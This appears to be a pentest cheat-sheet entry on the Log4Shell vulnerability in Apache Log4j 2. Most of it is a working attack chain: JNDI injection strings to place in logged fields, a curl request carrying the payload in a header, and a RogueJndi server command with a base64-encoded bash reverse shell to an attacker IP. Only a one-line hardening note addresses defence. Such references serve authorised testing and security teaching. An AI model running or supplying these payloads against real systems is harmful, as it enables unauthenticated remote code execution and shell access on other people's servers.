Log4Shell (Log4j JNDI)
aka log4j, cve-2021-44228
CVE-2021-44228 in Apache Log4j 2: any attacker-controlled string that gets logged can trigger a JNDI lookup, pulling a malicious Java class from your LDAP server for unauthenticated RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
0 | tcp | any Java service that logs user input (HTTP headers, chat, login fields) |
Fingerprint
- Java app; vulnerable injection points reflect into logs (User-Agent, X-Forwarded-For, username, Minecraft chat)
- Outbound LDAP/DNS callback when ${jndi:...} is submitted
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2021-44228 | Log4j 2 JNDI lookup → unauthenticated RCE |
| CVE-2021-45046 | Incomplete fix; RCE/DoS in 2.15.0 |
Exploitation primitives
- Inject ${jndi:ldap://<YOUR_IP>:1389/a} into any logged field
- Serve the payload class with a rogue JNDI/LDAP referral server (rogue-jndi / marshalsec)
- Confirm blind targets with a DNS callback: ${jndi:dns://<collab>}
Overview
Log4Shell is a vuln class, not a service: it lands wherever a Java app logs attacker input with a vulnerable Log4j 2. Test every field — headers, login forms, even Minecraft chat.
Stand up the JNDI server
Generate a base64 reverse-shell command and serve the payload class:
java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "<YOUR_IP>"Fire the payload
Submit the JNDI string into any logged input:
curl http://<TARGET>:8080/ -H 'X-Api-Version: ${jndi:ldap://<YOUR_IP>:1389/o=tomcat}'Blind check with a DNS callback first:
${jndi:dns://<YOUR_COLLAB_DOMAIN>}Hardening
Upgrade Log4j to ≥ 2.17.1, set log4j2.formatMsgNoLookups=true as a stopgap, and egress-filter outbound LDAP/RMI.